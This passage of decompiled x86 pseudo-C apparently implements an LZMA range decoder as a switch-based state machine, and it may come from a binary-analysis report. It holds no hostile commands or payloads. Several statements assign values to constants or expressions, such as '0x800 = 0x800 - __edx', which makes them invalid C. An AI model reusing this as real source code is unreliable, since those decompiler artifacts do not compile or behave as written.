                                                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            												if( *(__ebp - 0x38) >= 4) {
                                                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                                                            														_t98 = __ebp - 0x38;
                                                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                            														__eflags =  *_t98;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            													}
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x38) = 0;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                            												if( *(__ebp - 0x34) == __edx) {
                                                                                            													__ebx = 0;
                                                                                            													__ebx = 1;
                                                                                            													goto L61;
                                                                                            												} else {
                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                            														__eflags = __eax;
                                                                                            													}
                                                                                            													__ecx =  *(__ebp - 8);
                                                                                            													__ebx = 0;
                                                                                            													__ebx = 1;
                                                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            													goto L41;
                                                                                            												}
                                                                                            											case 7:
                                                                                            												goto L0;
                                                                                            											case 8:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                            													 *(__ebp - 0x84) = 0xa;
                                                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                            												} else {
                                                                                            													__eax =  *(__ebp - 0x38);
                                                                                            													__ecx =  *(__ebp - 4);
                                                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                            													 *(__ebp - 0x84) = 9;
                                                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                            												}
                                                                                            												while(1) {
                                                                                            													L132:
                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											case 9:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													goto L89;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x60);
                                                                                            												if( *(__ebp - 0x60) == 0) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												__eax = 0;
                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            												__eflags = _t258;
                                                                                            												0 | _t258 = _t258 + _t258 + 9;
                                                                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                            												goto L75;
                                                                                            											case 0xa:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                            													 *(__ebp - 0x84) = 0xb;
                                                                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                            													while(1) {
                                                                                            														L132:
                                                                                            														 *(_t621 - 0x54) = _t614;
                                                                                            														goto L133;
                                                                                            													}
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                            												goto L88;
                                                                                            											case 0xb:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__ecx =  *(__ebp - 0x24);
                                                                                            													__eax =  *(__ebp - 0x20);
                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            												} else {
                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x28);
                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            												L88:
                                                                                            												__ecx =  *(__ebp - 0x2c);
                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            												L89:
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												 *(__ebp - 0x80) = 0x15;
                                                                                            												__eax =  *(__ebp - 4) + 0xa68;
                                                                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                            												goto L68;
                                                                                            											case 0xc:
                                                                                            												L99:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xc;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t334 = __ebp - 0x70;
                                                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t334;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												goto L101;
                                                                                            											case 0xd:
                                                                                            												L37:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xd;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t122 = __ebp - 0x70;
                                                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t122;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												L39:
                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            													goto L48;
                                                                                            												}
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													goto L54;
                                                                                            												}
                                                                                            												L41:
                                                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            												 *(__ebp - 0x48) = __eax;
                                                                                            												__eax = __eax + 1;
                                                                                            												__eax = __eax << 8;
                                                                                            												__eax = __eax + __ebx;
                                                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edx = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													 *(__ebp - 0x40) = 1;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													__ebx = __ebx + __ebx + 1;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edx;
                                                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													goto L39;
                                                                                            												} else {
                                                                                            													goto L37;
                                                                                            												}
                                                                                            											case 0xe:
                                                                                            												L46:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xe;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t156 = __ebp - 0x70;
                                                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t156;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												while(1) {
                                                                                            													L48:
                                                                                            													__eflags = __ebx - 0x100;
                                                                                            													if(__ebx >= 0x100) {
                                                                                            														break;
                                                                                            													}
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													__edx = __ebx + __ebx;
                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                            													__esi = __edx + __eax;
                                                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            													__ax =  *__esi;
                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                            													__edi = __ax & 0x0000ffff;
                                                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            														__cx = __ax;
                                                                                            														_t170 = __edx + 1; // 0x1
                                                                                            														__ebx = _t170;
                                                                                            														__cx = __ax >> 5;
                                                                                            														__eflags = __eax;
                                                                                            														 *__esi = __ax;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x10) = __ecx;
                                                                                            														0x800 = 0x800 - __edi;
                                                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            														__ebx = __ebx + __ebx;
                                                                                            														 *__esi = __cx;
                                                                                            													}
                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            														continue;
                                                                                            													} else {
                                                                                            														goto L46;
                                                                                            													}
                                                                                            												}
                                                                                            												L54:
                                                                                            												_t173 = __ebp - 0x34;
                                                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            												__eflags =  *_t173;
                                                                                            												goto L55;
                                                                                            											case 0xf:
                                                                                            												L58:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xf;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t203 = __ebp - 0x70;
                                                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t203;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												L60:
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													L55:
                                                                                            													__al =  *(__ebp - 0x44);
                                                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            													goto L56;
                                                                                            												}
                                                                                            												L61:
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												__edx = __ebx + __ebx;
                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                            												__esi = __edx + __eax;
                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													_t217 = __edx + 1; // 0x1
                                                                                            													__ebx = _t217;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edi;
                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													goto L60;
                                                                                            												} else {
                                                                                            													goto L58;
                                                                                            												}
                                                                                            											case 0x10:
                                                                                            												L109:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0x10;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t365 = __ebp - 0x70;
                                                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t365;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												goto L111;
                                                                                            											case 0x11:
                                                                                            												L68:
                                                                                            												_t614 =  *(_t621 - 0x58);
                                                                                            												 *(_t621 - 0x84) = 0x12;
                                                                                            												while(1) {
                                                                                            													L132:
                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											case 0x12:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													 *(__ebp - 0x84) = 0x13;
                                                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                                                            													while(1) {
                                                                                            														L132:
                                                                                            														 *(_t621 - 0x54) = _t614;
                                                                                            														goto L133;
                                                                                            													}
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                            												__eflags = __eax;
                                                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                            												goto L130;
                                                                                            											case 0x13:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													_t469 = __ebp - 0x58;
                                                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                            													__eflags =  *_t469;
                                                                                            													 *(__ebp - 0x30) = 0x10;
                                                                                            													 *(__ebp - 0x40) = 8;
                                                                                            													L144:
                                                                                            													 *(__ebp - 0x7c) = 0x14;
                                                                                            													goto L145;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                            												 *(__ebp - 0x30) = 8;
                                                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                            												L130:
                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                            												 *(__ebp - 0x40) = 3;
                                                                                            												goto L144;
                                                                                            											case 0x14:
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                            												__eax =  *(__ebp - 0x80);
                                                                                            												 *(_t621 - 0x88) = _t542;
                                                                                            												goto L1;
                                                                                            											case 0x15:
                                                                                            												__eax = 0;
                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            												__al = __al & 0x000000fd;
                                                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                            												goto L120;
                                                                                            											case 0x16:
                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                            												__eflags = __eax - 4;
                                                                                            												if(__eax >= 4) {
                                                                                            													_push(3);
                                                                                            													_pop(__eax);
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 4);
                                                                                            												 *(__ebp - 0x40) = 6;
                                                                                            												__eax = __eax << 7;
                                                                                            												 *(__ebp - 0x7c) = 0x19;
                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                            												goto L145;
                                                                                            											case 0x17:
                                                                                            												L145:
                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                            												 *(__ebp - 0x50) = 1;
                                                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                            												goto L149;
                                                                                            											case 0x18:
                                                                                            												L146:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0x18;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t484 = __ebp - 0x70;
                                                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t484;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												L148:
                                                                                            												_t487 = __ebp - 0x48;
                                                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                            												__eflags =  *_t487;
                                                                                            												L149:
                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                            													__ecx =  *(__ebp - 0x40);
                                                                                            													__ebx =  *(__ebp - 0x50);
                                                                                            													0 = 1;
                                                                                            													__eax = 1 << __cl;
                                                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                            													__eax =  *(__ebp - 0x7c);
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            													while(1) {
                                                                                            														 *(_t621 - 0x88) = _t542;
                                                                                            														goto L1;
                                                                                            													}
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x50);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												__esi = __edx + __eax;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__ax =  *__esi;
                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eax = __eax - __ecx;
                                                                                            													__edx = __edx + 1;
                                                                                            													__eflags = __edx;
                                                                                            													 *__esi = __ax;
                                                                                            													 *(__ebp - 0x50) = __edx;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edi;
                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													goto L148;
                                                                                            												} else {
                                                                                            													goto L146;
                                                                                            												}
                                                                                            											case 0x19:
                                                                                            												__eflags = __ebx - 4;
                                                                                            												if(__ebx < 4) {
                                                                                            													 *(__ebp - 0x2c) = __ebx;
                                                                                            													L119:
                                                                                            													_t393 = __ebp - 0x2c;
                                                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                            													__eflags =  *_t393;
                                                                                            													L120:
                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                            													__eflags = __eax;
                                                                                            													if(__eax == 0) {
                                                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                            														goto L170;
                                                                                            													}
                                                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                                                            														goto L171;
                                                                                            													}
                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                            													__eax =  *(__ebp - 0x30);
                                                                                            													_t400 = __ebp - 0x60;
                                                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                            													__eflags =  *_t400;
                                                                                            													goto L123;
                                                                                            												}
                                                                                            												__ecx = __ebx;
                                                                                            												__eax = __ebx;
                                                                                            												__ecx = __ebx >> 1;
                                                                                            												__eax = __ebx & 0x00000001;
                                                                                            												__ecx = (__ebx >> 1) - 1;
                                                                                            												__al = __al | 0x00000002;
                                                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                                                            												__eflags = __ebx - 0xe;
                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                            												if(__ebx >= 0xe) {
                                                                                            													__ebx = 0;
                                                                                            													 *(__ebp - 0x48) = __ecx;
                                                                                            													L102:
                                                                                            													__eflags =  *(__ebp - 0x48);
                                                                                            													if( *(__ebp - 0x48) <= 0) {
                                                                                            														__eax = __eax + __ebx;
                                                                                            														 *(__ebp - 0x40) = 4;
                                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                                            														__eax =  *(__ebp - 4);
                                                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                                                            														__eflags = __eax;
                                                                                            														L108:
                                                                                            														__ebx = 0;
                                                                                            														 *(__ebp - 0x58) = __eax;
                                                                                            														 *(__ebp - 0x50) = 1;
                                                                                            														 *(__ebp - 0x44) = 0;
                                                                                            														 *(__ebp - 0x48) = 0;
                                                                                            														L112:
                                                                                            														__eax =  *(__ebp - 0x40);
                                                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                            															_t391 = __ebp - 0x2c;
                                                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                            															__eflags =  *_t391;
                                                                                            															goto L119;
                                                                                            														}
                                                                                            														__eax =  *(__ebp - 0x50);
                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            														__eax =  *(__ebp - 0x58);
                                                                                            														__esi = __edi + __eax;
                                                                                            														 *(__ebp - 0x54) = __esi;
                                                                                            														__ax =  *__esi;
                                                                                            														__ecx = __ax & 0x0000ffff;
                                                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                                                            															__ecx = 0;
                                                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                            															__ecx = 1;
                                                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                            															__ebx = 1;
                                                                                            															__ecx =  *(__ebp - 0x48);
                                                                                            															__ebx = 1 << __cl;
                                                                                            															__ecx = 1 << __cl;
                                                                                            															__ebx =  *(__ebp - 0x44);
                                                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                            															__cx = __ax;
                                                                                            															__cx = __ax >> 5;
                                                                                            															__eax = __eax - __ecx;
                                                                                            															__edi = __edi + 1;
                                                                                            															__eflags = __edi;
                                                                                            															 *(__ebp - 0x44) = __ebx;
                                                                                            															 *__esi = __ax;
                                                                                            															 *(__ebp - 0x50) = __edi;
                                                                                            														} else {
                                                                                            															 *(__ebp - 0x10) = __edx;
                                                                                            															0x800 = 0x800 - __ecx;
                                                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            															 *__esi = __dx;
                                                                                            														}
                                                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            															L111:
                                                                                            															_t368 = __ebp - 0x48;
                                                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                            															__eflags =  *_t368;
                                                                                            															goto L112;
                                                                                            														} else {
                                                                                            															goto L109;
                                                                                            														}
                                                                                            													}
                                                                                            													__ecx =  *(__ebp - 0xc);
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                            														__ecx =  *(__ebp - 0x10);
                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            														__ebx = __ebx | 0x00000001;
                                                                                            														__eflags = __ebx;
                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                            													}
                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            														L101:
                                                                                            														_t338 = __ebp - 0x48;
                                                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
